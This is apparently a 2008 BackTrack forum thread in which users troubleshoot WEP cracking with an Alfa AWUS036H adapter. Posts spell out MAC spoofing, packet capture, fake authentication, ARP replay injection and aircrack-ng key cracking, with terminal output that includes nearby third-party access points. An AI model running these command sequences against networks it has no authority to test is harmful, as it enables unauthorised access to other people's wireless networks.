Help! AWUS036H tormenting me...

**neosmith53** · 06-07-2008, 10:06 AM

First of all, can't tell you how many tutorials I have read trying to get this to work. It's very frustrating seeing everyone say how well their card seems to be working and my card still apparently sucks. My problem is apparently this error message:
-------
Sending Authentification Request (Open System) [ACK]
Sending Authentication Request (Open System) [ACK]
Attack was unsuccessful. Possible reasons:

* Perhaps MAC address filtering is enabled.
* Check that the BSSID (-a option) is correct.
* Try to change the number of packets (-o option).
* The driver/card doesn't support injection.
* This attack sometimes fails against some APs.
* The card is not on the same channel as the AP.
* You're too far from the AP. Get closer, or lower
the transmit rate.

---------
I have made sure the MAC filtering was not on (having used 3 different router models including a linksys, d-link and SMC Barricade, which my brother borrows for testing purposes from work)

I've checked and rechecked the BSSID to make sure it's correct.

I've seen tutorials talking about changing the number of packets, and a change in the command apparently does nothing.

My card is supposedly on the list of injectable cards.

I've rechecked the channel to make sure it's in sync with the router.

And I've been every where from a foot away to the other side of the house in terms of distance from the AP.

So, what gives.

Here's one of the tutorials (from Xploitz) I have tried:

airmon-ng stop ath0
ifconfig wifi0 down
macchanger --mac 00:11:22:33:44:55 wifi0
airmon-ng start wifi0
airodump-ng ath0
break & copy bssid
airodump-ng -c 11 -w test --bssid (AP) ath0
(the next line is where my problem occurs)
aireplay-ng -1 0 -e belkin54g -a (AP) -h 00:11:22:33:44:55 ath0 *success*
**ok at this point here, you should have your smiley face showing success**
aireplay-ng -3 -b (AP) -h 00:11:22:33:44:55 ath0
**note if there is no activity, the ARP's will not increase - means NO ivs**
so be patient, i had 2 wait for around 6 mins before this worked & got approx 300K IV's & cracked it in 00:00:00 seconds
*** good tip i used was on the laptop i was using for as a client, i just pinged google -t
aircrack-ng *.cap

Here are my system stats:
Alfa Network 802.11g High Power Wireless USB Adapter Model: AWUS036H
13.3 Macbook 2 GHz Intel C2D, 2GB RAM,
Mac OSX Leopard 10.5.3
BackTrack 3 Beta (Also have tried BT2 Final)
Vmware Fusion Version 2.0b1 (89933) (tried out ver 1.0 - 1.3 as well)

Some help anyone?

**imported_=Tron=** · 06-08-2008, 07:07 AM

Well I can confirm that injection is supported out of the box for AWUS036H in BT3b so the problem is most likely to be found in your commands. You should post the actual commands that you use and not only the tutorial that you say that you have followed. This would make it easy for any of us to check that you do not have some error in them.

However these commands should work fine for your Alfa card:

Code:

iwconfig wlan0 mode monitor
macchanger -A wlan0
airodump-ng wlan0 -c X --bssid XX:XX:XX:XX:XX:XX -w filename
aireplay-ng -1 0 -e APname -a XX:XX:XX:XX:XX:XX wlan0
aireplay-ng -3 -b XX:XX:XX:XX:XX:XX

Just input the right channel number, name of the AP (only needed if it is cloaked) and BSSID of the AP.

**neosmith53** · 06-08-2008, 11:53 AM

Originally Posted by =Tron=

Well I can confirm that injection is supported out of the box for AWUS036H in BT3b so the problem is most likely to be found in your commands. You should post the actual commands that you use and not only the tutorial that you say that you have followed. This would make it easy for any of us to check that you do not have some error in them.

However these commands should work fine for your Alfa card:

Code:

iwconfig wlan0 mode monitor
macchanger -A wlan0
airodump-ng wlan0 -c X --bssid XX:XX:XX:XX:XX:XX -w filename
aireplay-ng -1 0 -e APname -a XX:XX:XX:XX:XX:XX wlan0
aireplay-ng -3 -b XX:XX:XX:XX:XX:XX

Just input the right channel number, name of the AP (only needed if it is cloaked) and BSSID of the AP.

OK so I started up BT3, plugged in the alfa and open up a Terminal window:

bt ~ # iwconfig wlan0 mode monitor
bt ~ # macchanger -A wlan0
Current MAC: 00:c0:ca:18:12:69 (Alfa, Inc.)
Faked MAC: 00:09:22:d6:93:8f (Touchless Sensor Technology Ag)
bt ~ # airodump-ng wlan0 -c 6 --bssid 00:19:E0:F9:A9:AA -w testing

CH 6 ][ Elapsed: 4 mins ][ 2008-06-08 12:08

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ES

00:19:E0:F9:A9:AA 13 2 1854 944 0 6 54. WEP WEP L

BSSID STATION PWR Rate Lost Packets Probes

00:19:E0:F9:A9:AA 00:18

E:28:1C:A5 33 0-48 4 151
00:19:E0:F9:A9:AA 00:1B:77:47:F9:5A 12 0- 1 0 95
00:19:E0:F9:A9:AA 00:1E:C2:AA:4B:50 -1 1- 0 0 1034

then I open up a new terminal window:

bt ~ # aireplay-ng -1 0 -e Linksys -a 00:19:E0:F9:A9:AA wlan0
No source MAC (-h) specified. Using the device MAC (00:09:22

6:93:8F)
12:06:04 Waiting for beacon frame (BSSID: 00:19:E0:F9:A9:AA) on channel 6

12:06:04 Sending Authentication Request (Open System)
12:06:06 Sending Authentication Request (Open System)
12:06:08 Sending Authentication Request (Open System)
12:06:10 Sending Authentication Request (Open System)
12:06:12 Sending Authentication Request (Open System)
12:06:14 Sending Authentication Request (Open System)
12:06:16 Sending Authentication Request (Open System)
12:06:18 Sending Authentication Request (Open System)
12:06:20 Sending Authentication Request (Open System)
12:06:22 Sending Authentication Request (Open System)
12:06:24 Sending Authentication Request (Open System)
12:06:26 Sending Authentication Request (Open System)
12:06:28 Sending Authentication Request (Open System)
12:06:30 Sending Authentication Request (Open System)
12:06:32 Sending Authentication Request (Open System)
12:06:34 Sending Authentication Request (Open System)
Attack was unsuccessful. Possible reasons:

* Perhaps MAC address filtering is enabled.
* Check that the BSSID (-a option) is correct.
* Try to change the number of packets (-o option).
* The driver/card doesn't support injection.
* This attack sometimes fails against some APs.
* The card is not on the same channel as the AP.
* You're too far from the AP. Get closer, or lower
the transmit rate.

Is there a timeframe I should be considering when entering the aireplay-ng command, or a certain amout of data or something?

**imported_=Tron=** · 06-08-2008, 01:22 PM

Is there a timeframe I should be considering when entering the aireplay-ng command, or a certain amout of data or something?

No there is no timeframe that you have to worry about. However, I am unable to find any error in the commands that you use, as I have successfully used them several times with my own Alfa card. But, are you able to connect to the AP successfully using the Alfa card and your WEP key?

**Shatter** · 06-08-2008, 01:39 PM

Curious...
What is the output when you test the injection?
aireplay-ng --test wlan0

And have you tried lowering the tx rate?
iwconfig wlan0 rate 1M

**neosmith53** · 06-08-2008, 10:56 PM

Originally Posted by =Tron=

No there is no timeframe that you have to worry about. However, I am unable to find any error in the commands that you use, as I have successfully used them several times with my own Alfa card. But, are you able to connect to the AP successfully using the Alfa card and your WEP key?

I have no problems connecting to a WEP or WPA AES/TSK connection using the card.

**neosmith53** · 06-08-2008, 11:01 PM

Originally Posted by xCPPx

Curious...
What is the output when you test the injection?
aireplay-ng --test wlan0

And have you tried lowering the tx rate?
iwconfig wlan0 rate 1M

on testing the injection I get this:

bt ~ # aireplay-ng --test wlan0
23:12:21 Trying broadcast probe requests...
23:12:22 No Answer...
23:12:22 Found 6 APs

23:12:22 Trying directed probe requests...
23:12:22 00:16:B6:3C:3F:74 - channel: 6 - 'aaa'
23:12:29 0/30: 0%

23:12:29 00:16:B6:04:01:51 - channel: 6 - 'bbb'
23:12:35 0/30: 0%

23:12:35 00:1D:7E:2E:7E:BA - channel: 6 - 'ccc'
23:12:42 0/30: 0%

23:12:42 00:18:39:B2:79:20 - channel: 6 - 'ddd'
23:12:48 0/30: 0%

23:12:48 00:11:95:7A:48:46 - channel: 6 - 'eee'
23:12:55 0/30: 0%

basically a few of the wireless internet locations nearby as well as my own....

and lowering the bitrate, using the command u provided I rentered the commands from the second post but no change in response.

I told you... it's tormenting me... it's evil.

**Zauber** · 06-09-2008, 04:25 AM

It is happening the exact same thing to me. Fake authentication does not work. And even if i only use the injection, it says that the injection is working, and i see the amount of packets sent, BUT, on aerodump its the same as nothing, like if injection wasnt working at all... I tried with a USB pen, a Linksys WUSB54GC, and again, same results... Im struggling to understand why this happens...

**imported_=Tron=** · 06-09-2008, 04:32 AM

Fake authentication does not work. And even if i only use the injection, it says that the injection is working, and i see the amount of packets sent, BUT, on aerodump its the same as nothing, like if injection wasnt working at all...

You will not be able to successfully inject unless you are properly authenticated with the AP first.

**Zauber** · 06-09-2008, 04:50 AM

Originally Posted by =Tron=

You will not be able to successfully inject unless you are properly authenticated with the AP first.

Oh, i thought that by using a 2nd machine already connected to the AP that you could use injection using that machines mac address.

Anyway, the problem remains, why cant it associate with neither of the devices?

BackTrack Linux - Penetration Testing Distribution

Thread: Help! AWUS036H tormenting me...

Thread Tools

Search Thread

Display

Help! AWUS036H tormenting me...

Posting Permissions